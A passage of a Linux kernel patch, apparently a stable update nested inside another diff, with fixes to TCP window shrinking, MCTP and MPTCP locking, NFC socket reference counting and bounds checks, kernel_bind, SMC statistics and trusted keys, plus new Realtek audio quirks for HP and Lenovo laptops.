+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -259,8 +259,8 @@ static u16 tcp_select_window(struct sock *sk)
+ 	u32 old_win = tp->rcv_wnd;
+ 	u32 cur_win = tcp_receive_window(tp);
+ 	u32 new_win = __tcp_select_window(sk);
++	struct net *net = sock_net(sk);
+ 
+-	/* Never shrink the offered window */
+ 	if (new_win < cur_win) {
+ 		/* Danger Will Robinson!
+ 		 * Don't update rcv_wup/rcv_wnd here or else
+@@ -269,11 +269,14 @@ static u16 tcp_select_window(struct sock *sk)
+ 		 *
+ 		 * Relax Will Robinson.
+ 		 */
+-		if (new_win == 0)
+-			NET_INC_STATS(sock_net(sk),
+-				      LINUX_MIB_TCPWANTZEROWINDOWADV);
+-		new_win = ALIGN(cur_win, 1 << tp->rx_opt.rcv_wscale);
++		if (!READ_ONCE(net->ipv4.sysctl_tcp_shrink_window) || !tp->rx_opt.rcv_wscale) {
++			/* Never shrink the offered window */
++			if (new_win == 0)
++				NET_INC_STATS(net, LINUX_MIB_TCPWANTZEROWINDOWADV);
++			new_win = ALIGN(cur_win, 1 << tp->rx_opt.rcv_wscale);
++		}
+ 	}
++
+ 	tp->rcv_wnd = new_win;
+ 	tp->rcv_wup = tp->rcv_nxt;
+ 
+@@ -281,7 +284,7 @@ static u16 tcp_select_window(struct sock *sk)
+ 	 * scaled window.
+ 	 */
+ 	if (!tp->rx_opt.rcv_wscale &&
+-	    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_workaround_signed_windows))
++	    READ_ONCE(net->ipv4.sysctl_tcp_workaround_signed_windows))
+ 		new_win = min(new_win, MAX_TCP_WINDOW);
+ 	else
+ 		new_win = min(new_win, (65535U << tp->rx_opt.rcv_wscale));
+@@ -293,10 +296,9 @@ static u16 tcp_select_window(struct sock *sk)
+ 	if (new_win == 0) {
+ 		tp->pred_flags = 0;
+ 		if (old_win)
+-			NET_INC_STATS(sock_net(sk),
+-				      LINUX_MIB_TCPTOZEROWINDOWADV);
++			NET_INC_STATS(net, LINUX_MIB_TCPTOZEROWINDOWADV);
+ 	} else if (old_win == 0) {
+-		NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPFROMZEROWINDOWADV);
++		NET_INC_STATS(net, LINUX_MIB_TCPFROMZEROWINDOWADV);
+ 	}
+ 
+ 	return new_win;
+@@ -2949,6 +2951,7 @@ u32 __tcp_select_window(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
++	struct net *net = sock_net(sk);
+ 	/* MSS for the peer's data.  Previous versions used mss_clamp
+ 	 * here.  I don't know if the value based on our guesses
+ 	 * of peer's MSS is better for the performance.  It's more correct
+@@ -2970,6 +2973,15 @@ u32 __tcp_select_window(struct sock *sk)
+ 		if (mss <= 0)
+ 			return 0;
+ 	}
++
++	/* Only allow window shrink if the sysctl is enabled and we have
++	 * a non-zero scaling factor in effect.
++	 */
++	if (READ_ONCE(net->ipv4.sysctl_tcp_shrink_window) && tp->rx_opt.rcv_wscale)
++		goto shrink_window_allowed;
++
++	/* do not allow window to shrink */
++
+ 	if (free_space < (full_space >> 1)) {
+ 		icsk->icsk_ack.quick = 0;
+ 
+@@ -3024,6 +3036,36 @@ u32 __tcp_select_window(struct sock *sk)
+ 	}
+ 
+ 	return window;
++
++shrink_window_allowed:
++	/* new window should always be an exact multiple of scaling factor */
++	free_space = round_down(free_space, 1 << tp->rx_opt.rcv_wscale);
++
++	if (free_space < (full_space >> 1)) {
++		icsk->icsk_ack.quick = 0;
++
++		if (tcp_under_memory_pressure(sk))
++			tcp_adjust_rcv_ssthresh(sk);
++
++		/* if free space is too low, return a zero window */
++		if (free_space < (allowed_space >> 4) || free_space < mss ||
++			free_space < (1 << tp->rx_opt.rcv_wscale))
++			return 0;
++	}
++
++	if (free_space > tp->rcv_ssthresh) {
++		free_space = tp->rcv_ssthresh;
++		/* new window should always be an exact multiple of scaling factor
++		 *
++		 * For this case, we ALIGN "up" (increase free_space) because
++		 * we know free_space is not zero here, it has been reduced from
++		 * the memory-based limit, and rcv_ssthresh is not a hard limit
++		 * (unlike sk_rcvbuf).
++		 */
++		free_space = ALIGN(free_space, (1 << tp->rx_opt.rcv_wscale));
++	}
++
++	return free_space;
+ }
+ 
+ void tcp_skb_collapse_tstamp(struct sk_buff *skb,
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index f51a05ec71624..68be8f2b622dd 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -737,6 +737,8 @@ struct mctp_route *mctp_route_lookup(struct net *net, unsigned int dnet,
+ {
+ 	struct mctp_route *tmp, *rt = NULL;
+ 
++	rcu_read_lock();
++
+ 	list_for_each_entry_rcu(tmp, &net->mctp.routes, list) {
+ 		/* TODO: add metrics */
+ 		if (mctp_rt_match_eid(tmp, dnet, daddr)) {
+@@ -747,21 +749,29 @@ struct mctp_route *mctp_route_lookup(struct net *net, unsigned int dnet,
+ 		}
+ 	}
+ 
++	rcu_read_unlock();
++
+ 	return rt;
+ }
+ 
+ static struct mctp_route *mctp_route_lookup_null(struct net *net,
+ 						 struct net_device *dev)
+ {
+-	struct mctp_route *rt;
++	struct mctp_route *tmp, *rt = NULL;
+ 
+-	list_for_each_entry_rcu(rt, &net->mctp.routes, list) {
+-		if (rt->dev->dev == dev && rt->type == RTN_LOCAL &&
+-		    refcount_inc_not_zero(&rt->refs))
+-			return rt;
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(tmp, &net->mctp.routes, list) {
++		if (tmp->dev->dev == dev && tmp->type == RTN_LOCAL &&
++		    refcount_inc_not_zero(&tmp->refs)) {
++			rt = tmp;
++			break;
++		}
+ 	}
+ 
+-	return NULL;
++	rcu_read_unlock();
++
++	return rt;
+ }
+ 
+ static int mctp_do_fragment_route(struct mctp_route *rt, struct sk_buff *skb,
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index b6e0579e72644..881e05193ac97 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3456,24 +3456,21 @@ static void schedule_3rdack_retransmission(struct sock *ssk)
+ 	sk_reset_timer(ssk, &icsk->icsk_delack_timer, timeout);
+ }
+ 
+-void mptcp_subflow_process_delegated(struct sock *ssk)
++void mptcp_subflow_process_delegated(struct sock *ssk, long status)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	struct sock *sk = subflow->conn;
+ 
+-	if (test_bit(MPTCP_DELEGATE_SEND, &subflow->delegated_status)) {
++	if (status & BIT(MPTCP_DELEGATE_SEND)) {
+ 		mptcp_data_lock(sk);
+ 		if (!sock_owned_by_user(sk))
+ 			__mptcp_subflow_push_pending(sk, ssk);
+ 		else
+ 			__set_bit(MPTCP_PUSH_PENDING, &mptcp_sk(sk)->cb_flags);
+ 		mptcp_data_unlock(sk);
+-		mptcp_subflow_delegated_done(subflow, MPTCP_DELEGATE_SEND);
+ 	}
+-	if (test_bit(MPTCP_DELEGATE_ACK, &subflow->delegated_status)) {
++	if (status & BIT(MPTCP_DELEGATE_ACK))
+ 		schedule_3rdack_retransmission(ssk);
+-		mptcp_subflow_delegated_done(subflow, MPTCP_DELEGATE_ACK);
+-	}
+ }
+ 
+ static int mptcp_hash(struct sock *sk)
+@@ -3981,14 +3978,17 @@ static int mptcp_napi_poll(struct napi_struct *napi, int budget)
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 
+ 		bh_lock_sock_nested(ssk);
+-		if (!sock_owned_by_user(ssk) &&
+-		    mptcp_subflow_has_delegated_action(subflow))
+-			mptcp_subflow_process_delegated(ssk);
+-		/* ... elsewhere tcp_release_cb_override already processed
+-		 * the action or will do at next release_sock().
+-		 * In both case must dequeue the subflow here - on the same
+-		 * CPU that scheduled it.
+-		 */
++		if (!sock_owned_by_user(ssk)) {
++			mptcp_subflow_process_delegated(ssk, xchg(&subflow->delegated_status, 0));
++		} else {
++			/* tcp_release_cb_override already processed
++			 * the action or will do at next release_sock().
++			 * In both case must dequeue the subflow here - on the same
++			 * CPU that scheduled it.
++			 */
++			smp_wmb();
++			clear_bit(MPTCP_DELEGATE_SCHEDULED, &subflow->delegated_status);
++		}
+ 		bh_unlock_sock(ssk);
+ 		sock_put(ssk);
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 91d89a0aeb586..4ec8e0a81b5a4 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -430,9 +430,11 @@ struct mptcp_delegated_action {
+ 
+ DECLARE_PER_CPU(struct mptcp_delegated_action, mptcp_delegated_actions);
+ 
+-#define MPTCP_DELEGATE_SEND		0
+-#define MPTCP_DELEGATE_ACK		1
++#define MPTCP_DELEGATE_SCHEDULED	0
++#define MPTCP_DELEGATE_SEND		1
++#define MPTCP_DELEGATE_ACK		2
+ 
++#define MPTCP_DELEGATE_ACTIONS_MASK	(~BIT(MPTCP_DELEGATE_SCHEDULED))
+ /* MPTCP subflow context */
+ struct mptcp_subflow_context {
+ 	struct	list_head node;/* conn_list of subflows */
+@@ -543,23 +545,24 @@ mptcp_subflow_get_mapped_dsn(const struct mptcp_subflow_context *subflow)
+ 	return subflow->map_seq + mptcp_subflow_get_map_offset(subflow);
+ }
+ 
+-void mptcp_subflow_process_delegated(struct sock *ssk);
++void mptcp_subflow_process_delegated(struct sock *ssk, long actions);
+ 
+ static inline void mptcp_subflow_delegate(struct mptcp_subflow_context *subflow, int action)
+ {
++	long old, set_bits = BIT(MPTCP_DELEGATE_SCHEDULED) | BIT(action);
+ 	struct mptcp_delegated_action *delegated;
+ 	bool schedule;
+ 
+ 	/* the caller held the subflow bh socket lock */
+ 	lockdep_assert_in_softirq();
+ 
+-	/* The implied barrier pairs with mptcp_subflow_delegated_done(), and
+-	 * ensures the below list check sees list updates done prior to status
+-	 * bit changes
++	/* The implied barrier pairs with tcp_release_cb_override()
++	 * mptcp_napi_poll(), and ensures the below list check sees list
++	 * updates done prior to delegated status bits changes
+ 	 */
+-	if (!test_and_set_bit(action, &subflow->delegated_status)) {
+-		/* still on delegated list from previous scheduling */
+-		if (!list_empty(&subflow->delegated_node))
++	old = set_mask_bits(&subflow->delegated_status, 0, set_bits);
++	if (!(old & BIT(MPTCP_DELEGATE_SCHEDULED))) {
++		if (WARN_ON_ONCE(!list_empty(&subflow->delegated_node)))
+ 			return;
+ 
+ 		delegated = this_cpu_ptr(&mptcp_delegated_actions);
+@@ -584,20 +587,6 @@ mptcp_subflow_delegated_next(struct mptcp_delegated_action *delegated)
+ 	return ret;
+ }
+ 
+-static inline bool mptcp_subflow_has_delegated_action(const struct mptcp_subflow_context *subflow)
+-{
+-	return !!READ_ONCE(subflow->delegated_status);
+-}
+-
+-static inline void mptcp_subflow_delegated_done(struct mptcp_subflow_context *subflow, int action)
+-{
+-	/* pairs with mptcp_subflow_delegate, ensures delegate_node is updated before
+-	 * touching the status bit
+-	 */
+-	smp_wmb();
+-	clear_bit(action, &subflow->delegated_status);
+-}
+-
+ int mptcp_is_enabled(const struct net *net);
+ unsigned int mptcp_get_add_addr_timeout(const struct net *net);
+ int mptcp_is_checksum_enabled(const struct net *net);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index b93b08a75017b..d611783c2601f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1886,9 +1886,15 @@ static void subflow_ulp_clone(const struct request_sock *req,
+ static void tcp_release_cb_override(struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
++	long status;
+ 
+-	if (mptcp_subflow_has_delegated_action(subflow))
+-		mptcp_subflow_process_delegated(ssk);
++	/* process and clear all the pending actions, but leave the subflow into
++	 * the napi queue. To respect locking, only the same CPU that originated
++	 * the action can touch the list. mptcp_napi_poll will take care of it.
++	 */
++	status = set_mask_bits(&subflow->delegated_status, MPTCP_DELEGATE_ACTIONS_MASK, 0);
++	if (status)
++		mptcp_subflow_process_delegated(ssk, status);
+ 
+ 	tcp_release_cb(ssk);
+ }
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index 6574f4e651b1a..e1dea9a820505 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -1441,7 +1441,7 @@ static int bind_mcastif_addr(struct socket *sock, struct net_device *dev)
+ 	sin.sin_addr.s_addr  = addr;
+ 	sin.sin_port         = 0;
+ 
+-	return sock->ops->bind(sock, (struct sockaddr*)&sin, sizeof(sin));
++	return kernel_bind(sock, (struct sockaddr *)&sin, sizeof(sin));
+ }
+ 
+ static void get_mcast_sockaddr(union ipvs_sockaddr *sa, int *salen,
+@@ -1548,7 +1548,7 @@ static int make_receive_sock(struct netns_ipvs *ipvs, int id,
+ 
+ 	get_mcast_sockaddr(&mcast_addr, &salen, &ipvs->bcfg, id);
+ 	sock->sk->sk_bound_dev_if = dev->ifindex;
+-	result = sock->ops->bind(sock, (struct sockaddr *)&mcast_addr, salen);
++	result = kernel_bind(sock, (struct sockaddr *)&mcast_addr, salen);
+ 	if (result < 0) {
+ 		pr_err("Error binding to the multicast addr\n");
+ 		goto error;
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index 6705bb895e239..1dac28136e6a3 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -203,17 +203,13 @@ static struct nfc_llcp_sock *nfc_llcp_sock_get(struct nfc_llcp_local *local,
+ 
+ 		if (tmp_sock->ssap == ssap && tmp_sock->dsap == dsap) {
+ 			llcp_sock = tmp_sock;
++			sock_hold(&llcp_sock->sk);
+ 			break;
+ 		}
+ 	}
+ 
+ 	read_unlock(&local->sockets.lock);
+ 
+-	if (llcp_sock == NULL)
+-		return NULL;
+-
+-	sock_hold(&llcp_sock->sk);
+-
+ 	return llcp_sock;
+ }
+ 
+@@ -346,7 +342,8 @@ static int nfc_llcp_wks_sap(const char *service_name, size_t service_name_len)
+ 
+ static
+ struct nfc_llcp_sock *nfc_llcp_sock_from_sn(struct nfc_llcp_local *local,
+-					    const u8 *sn, size_t sn_len)
++					    const u8 *sn, size_t sn_len,
++					    bool needref)
+ {
+ 	struct sock *sk;
+ 	struct nfc_llcp_sock *llcp_sock, *tmp_sock;
+@@ -382,6 +379,8 @@ struct nfc_llcp_sock *nfc_llcp_sock_from_sn(struct nfc_llcp_local *local,
+ 
+ 		if (memcmp(sn, tmp_sock->service_name, sn_len) == 0) {
+ 			llcp_sock = tmp_sock;
++			if (needref)
++				sock_hold(&llcp_sock->sk);
+ 			break;
+ 		}
+ 	}
+@@ -423,7 +422,8 @@ u8 nfc_llcp_get_sdp_ssap(struct nfc_llcp_local *local,
+ 		 * to this service name.
+ 		 */
+ 		if (nfc_llcp_sock_from_sn(local, sock->service_name,
+-					  sock->service_name_len) != NULL) {
++					  sock->service_name_len,
++					  false) != NULL) {
+ 			mutex_unlock(&local->sdp_lock);
+ 
+ 			return LLCP_SAP_MAX;
+@@ -824,16 +824,7 @@ out:
+ static struct nfc_llcp_sock *nfc_llcp_sock_get_sn(struct nfc_llcp_local *local,
+ 						  const u8 *sn, size_t sn_len)
+ {
+-	struct nfc_llcp_sock *llcp_sock;
+-
+-	llcp_sock = nfc_llcp_sock_from_sn(local, sn, sn_len);
+-
+-	if (llcp_sock == NULL)
+-		return NULL;
+-
+-	sock_hold(&llcp_sock->sk);
+-
+-	return llcp_sock;
++	return nfc_llcp_sock_from_sn(local, sn, sn_len, true);
+ }
+ 
+ static const u8 *nfc_llcp_connect_sn(const struct sk_buff *skb, size_t *sn_len)
+@@ -1298,7 +1289,8 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
+ 			}
+ 
+ 			llcp_sock = nfc_llcp_sock_from_sn(local, service_name,
+-							  service_name_len);
++							  service_name_len,
++							  true);
+ 			if (!llcp_sock) {
+ 				sap = 0;
+ 				goto add_snl;
+@@ -1318,6 +1310,7 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
+ 
+ 				if (sap == LLCP_SAP_MAX) {
+ 					sap = 0;
++					nfc_llcp_sock_put(llcp_sock);
+ 					goto add_snl;
+ 				}
+ 
+@@ -1335,6 +1328,7 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
+ 
+ 			pr_debug("%p %d\n", llcp_sock, sap);
+ 
++			nfc_llcp_sock_put(llcp_sock);
+ add_snl:
+ 			sdp = nfc_llcp_build_sdres_tlv(tid, sap);
+ 			if (sdp == NULL)
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index 4ffdf2f45c444..7535afd1537e9 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -908,6 +908,11 @@ static int nci_activate_target(struct nfc_dev *nfc_dev,
+ 		return -EINVAL;
+ 	}
+ 
++	if (protocol >= NFC_PROTO_MAX) {
++		pr_err("the requested nfc protocol is invalid\n");
++		return -EINVAL;
++	}
++
+ 	if (!(nci_target->supported_protocols & (1 << protocol))) {
+ 		pr_err("target does not support the requested protocol 0x%x\n",
+ 		       protocol);
+diff --git a/net/rds/tcp_connect.c b/net/rds/tcp_connect.c
+index d788c6d28986f..a0046e99d6df7 100644
+--- a/net/rds/tcp_connect.c
++++ b/net/rds/tcp_connect.c
+@@ -145,7 +145,7 @@ int rds_tcp_conn_path_connect(struct rds_conn_path *cp)
+ 		addrlen = sizeof(sin);
+ 	}
+ 
+-	ret = sock->ops->bind(sock, addr, addrlen);
++	ret = kernel_bind(sock, addr, addrlen);
+ 	if (ret) {
+ 		rdsdebug("bind failed with %d at address %pI6c\n",
+ 			 ret, &conn->c_laddr);
+diff --git a/net/rds/tcp_listen.c b/net/rds/tcp_listen.c
+index 7edf2e69d3fed..b576bd252fecb 100644
+--- a/net/rds/tcp_listen.c
++++ b/net/rds/tcp_listen.c
+@@ -304,7 +304,7 @@ struct socket *rds_tcp_listen_init(struct net *net, bool isv6)
+ 		addr_len = sizeof(*sin);
+ 	}
+ 
+-	ret = sock->ops->bind(sock, (struct sockaddr *)&ss, addr_len);
++	ret = kernel_bind(sock, (struct sockaddr *)&ss, addr_len);
+ 	if (ret < 0) {
+ 		rdsdebug("could not bind %s listener socket: %d\n",
+ 			 isv6 ? "IPv6" : "IPv4", ret);
+diff --git a/net/smc/smc_stats.h b/net/smc/smc_stats.h
+index 4dbc237b7c19e..ee22d6f9a86aa 100644
+--- a/net/smc/smc_stats.h
++++ b/net/smc/smc_stats.h
+@@ -93,13 +93,14 @@ do { \
+ 	typeof(_smc_stats) stats = (_smc_stats); \
+ 	typeof(_tech) t = (_tech); \
+ 	typeof(_len) l = (_len); \
+-	int _pos = fls64((l) >> 13); \
++	int _pos; \
+ 	typeof(_rc) r = (_rc); \
+ 	int m = SMC_BUF_MAX - 1; \
+ 	this_cpu_inc((*stats).smc[t].key ## _cnt); \
+-	if (r <= 0) \
++	if (r <= 0 || l <= 0) \
+ 		break; \
+-	_pos = (_pos < m) ? ((l == 1 << (_pos + 12)) ? _pos - 1 : _pos) : m; \
++	_pos = fls64((l - 1) >> 13); \
++	_pos = (_pos <= m) ? _pos : m; \
+ 	this_cpu_inc((*stats).smc[t].key ## _pd.buf[_pos]); \
+ 	this_cpu_add((*stats).smc[t].key ## _bytes, r); \
+ } \
+@@ -139,9 +140,12 @@ while (0)
+ do { \
+ 	typeof(_len) _l = (_len); \
+ 	typeof(_tech) t = (_tech); \
+-	int _pos = fls((_l) >> 13); \
++	int _pos; \
+ 	int m = SMC_BUF_MAX - 1; \
+-	_pos = (_pos < m) ? ((_l == 1 << (_pos + 12)) ? _pos - 1 : _pos) : m; \
++	if (_l <= 0) \
++		break; \
++	_pos = fls((_l - 1) >> 13); \
++	_pos = (_pos <= m) ? _pos : m; \
+ 	this_cpu_inc((*(_smc_stats)).smc[t].k ## _rmbsize.buf[_pos]); \
+ } \
+ while (0)
+diff --git a/net/socket.c b/net/socket.c
+index b0169168e3f4e..04cba91c7cbe5 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -3454,7 +3454,11 @@ static long compat_sock_ioctl(struct file *file, unsigned int cmd,
+ 
+ int kernel_bind(struct socket *sock, struct sockaddr *addr, int addrlen)
+ {
+-	return sock->ops->bind(sock, addr, addrlen);
++	struct sockaddr_storage address;
++
++	memcpy(&address, addr, addrlen);
++
++	return sock->ops->bind(sock, (struct sockaddr *)&address, addrlen);
+ }
+ EXPORT_SYMBOL(kernel_bind);
+ 
+diff --git a/security/keys/trusted-keys/trusted_core.c b/security/keys/trusted-keys/trusted_core.c
+index c6fc50d67214c..85fb5c22529a7 100644
+--- a/security/keys/trusted-keys/trusted_core.c
++++ b/security/keys/trusted-keys/trusted_core.c
+@@ -44,13 +44,12 @@ static const struct trusted_key_source trusted_key_sources[] = {
+ #endif
+ };
+ 
+-DEFINE_STATIC_CALL_NULL(trusted_key_init, *trusted_key_sources[0].ops->init);
+ DEFINE_STATIC_CALL_NULL(trusted_key_seal, *trusted_key_sources[0].ops->seal);
+ DEFINE_STATIC_CALL_NULL(trusted_key_unseal,
+ 			*trusted_key_sources[0].ops->unseal);
+ DEFINE_STATIC_CALL_NULL(trusted_key_get_random,
+ 			*trusted_key_sources[0].ops->get_random);
+-DEFINE_STATIC_CALL_NULL(trusted_key_exit, *trusted_key_sources[0].ops->exit);
++static void (*trusted_key_exit)(void);
+ static unsigned char migratable;
+ 
+ enum {
+@@ -359,19 +358,16 @@ static int __init init_trusted(void)
+ 		if (!get_random)
+ 			get_random = kernel_get_random;
+ 
+-		static_call_update(trusted_key_init,
+-				   trusted_key_sources[i].ops->init);
+ 		static_call_update(trusted_key_seal,
+ 				   trusted_key_sources[i].ops->seal);
+ 		static_call_update(trusted_key_unseal,
+ 				   trusted_key_sources[i].ops->unseal);
+ 		static_call_update(trusted_key_get_random,
+ 				   get_random);
+-		static_call_update(trusted_key_exit,
+-				   trusted_key_sources[i].ops->exit);
++		trusted_key_exit = trusted_key_sources[i].ops->exit;
+ 		migratable = trusted_key_sources[i].ops->migratable;
+ 
+-		ret = static_call(trusted_key_init)();
++		ret = trusted_key_sources[i].ops->init();
+ 		if (!ret)
+ 			break;
+ 	}
+@@ -388,7 +384,8 @@ static int __init init_trusted(void)
+ 
+ static void __exit cleanup_trusted(void)
+ {
+-	static_call_cond(trusted_key_exit)();
++	if (trusted_key_exit)
++		(*trusted_key_exit)();
+ }
+ 
+ late_initcall(init_trusted);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 57e07aa4e136c..14e70e2f9c881 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -4639,6 +4639,22 @@ static void alc236_fixup_hp_mute_led_coefbit2(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc245_fixup_hp_mute_led_coefbit(struct hda_codec *codec,
++					  const struct hda_fixup *fix,
++					  int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
++		spec->mute_led_polarity = 0;
++		spec->mute_led_coef.idx = 0x0b;
++		spec->mute_led_coef.mask = 3 << 2;
++		spec->mute_led_coef.on = 2 << 2;
++		spec->mute_led_coef.off = 1 << 2;
++		snd_hda_gen_add_mute_led_cdev(codec, coef_mute_led_set);
++	}
++}
++
+ /* turn on/off mic-mute LED per capture hook by coef bit */
+ static int coef_micmute_led_set(struct led_classdev *led_cdev,
+ 				enum led_brightness brightness)
+@@ -6969,6 +6985,29 @@ static void alc295_fixup_dell_inspiron_top_speakers(struct hda_codec *codec,
+ 	}
+ }
+ 
++/* Forcibly assign NID 0x03 to HP while NID 0x02 to SPK */
++static void alc287_fixup_bind_dacs(struct hda_codec *codec,
++				    const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++	static const hda_nid_t conn[] = { 0x02, 0x03 }; /* exclude 0x06 */
++	static const hda_nid_t preferred_pairs[] = {
++		0x17, 0x02, 0x21, 0x03, 0
++	};
++
++	if (action != HDA_FIXUP_ACT_PRE_PROBE)
++		return;
++
++	snd_hda_override_conn_list(codec, 0x17, ARRAY_SIZE(conn), conn);
++	spec->gen.preferred_dacs = preferred_pairs;
++	spec->gen.auto_mute_via_amp = 1;
++	if (spec->gen.autocfg.speaker_pins[0] != 0x14) {
++		snd_hda_codec_write_cache(codec, 0x14, 0, AC_VERB_SET_PIN_WIDGET_CONTROL,
++					0x0); /* Make sure 0x14 was disable */
++	}
++}
++
++
+ enum {
+ 	ALC269_FIXUP_GPIO2,
+ 	ALC269_FIXUP_SONY_VAIO,
+@@ -7227,6 +7266,10 @@ enum {
+ 	ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS,
+ 	ALC236_FIXUP_DELL_DUAL_CODECS,
+ 	ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
++	ALC245_FIXUP_HP_MUTE_LED_COEFBIT,
++	ALC245_FIXUP_HP_X360_MUTE_LEDS,
++	ALC287_FIXUP_THINKPAD_I2S_SPK,
++	ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -9296,6 +9339,26 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
+ 	},
++	[ALC245_FIXUP_HP_MUTE_LED_COEFBIT] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc245_fixup_hp_mute_led_coefbit,
++	},
++	[ALC245_FIXUP_HP_X360_MUTE_LEDS] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc245_fixup_hp_mute_led_coefbit,
++		.chained = true,
++		.chain_id = ALC245_FIXUP_HP_GPIO_LED
++	},
++	[ALC287_FIXUP_THINKPAD_I2S_SPK] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc287_fixup_bind_dacs,
++	},
++	[ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc287_fixup_bind_dacs,
++		.chained = true,
++		.chain_id = ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9531,6 +9594,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8870, "HP ZBook Fury 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8873, "HP ZBook Studio 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x887a, "HP Laptop 15s-eq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
++	SND_PCI_QUIRK(0x103c, 0x888a, "HP ENVY x360 Convertible 15-eu0xxx", ALC245_FIXUP_HP_X360_MUTE_LEDS),
+ 	SND_PCI_QUIRK(0x103c, 0x888d, "HP ZBook Power 15.6 inch G8 Mobile Workstation PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8895, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_SPEAKERS_MICMUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8896, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_MUTE_LED),
+@@ -9562,6 +9626,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8a25, "HP Victus 16-d1xxx (MB 8A25)", ALC245_FIXUP_HP_MUTE_LED_COEFBIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa0, "HP ProBook 440 G9 (MB 8A9E)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9697,7 +9762,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1254, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+-	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC225_FIXUP_HEADSET_JACK),
++	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
